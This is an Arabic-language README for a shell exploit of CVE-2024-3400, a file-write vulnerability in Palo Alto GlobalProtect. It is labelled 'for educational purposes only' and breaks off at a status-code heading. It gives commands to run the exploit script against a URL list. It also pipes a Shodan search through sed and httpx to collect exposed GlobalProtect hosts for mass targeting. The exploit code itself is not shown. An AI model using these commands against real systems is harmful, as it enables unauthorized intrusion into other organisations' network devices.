
استغلال كتابة ملف لـ Global Protec من Palo Alto
CVE-2024-3400 Palo Alto استغلال كتابة ملف
هذا الاستغلال يبحث في عناوين Global Protect URLS ويحاول كتابة ملف باستخدام CVE-2024-3400
[ استخدم بحذر ]
[ أُعد لأغراض تعليمية فقط ]
الاستخدام:
chmod +x gp-exploit.sh
./gp-exploit.sh file_name_to_write urls.txt

بحث Shodan وتصفية العناوين:
# shodan search --fields ip_str,port 'http.html:"Global Protect"' --separator ":" | sed 's/.$//' > gp.hosts
# httpx -l gp.hosts
# ./gp-exploit file_name gp.hosts
التحقق من رموز الحالة:
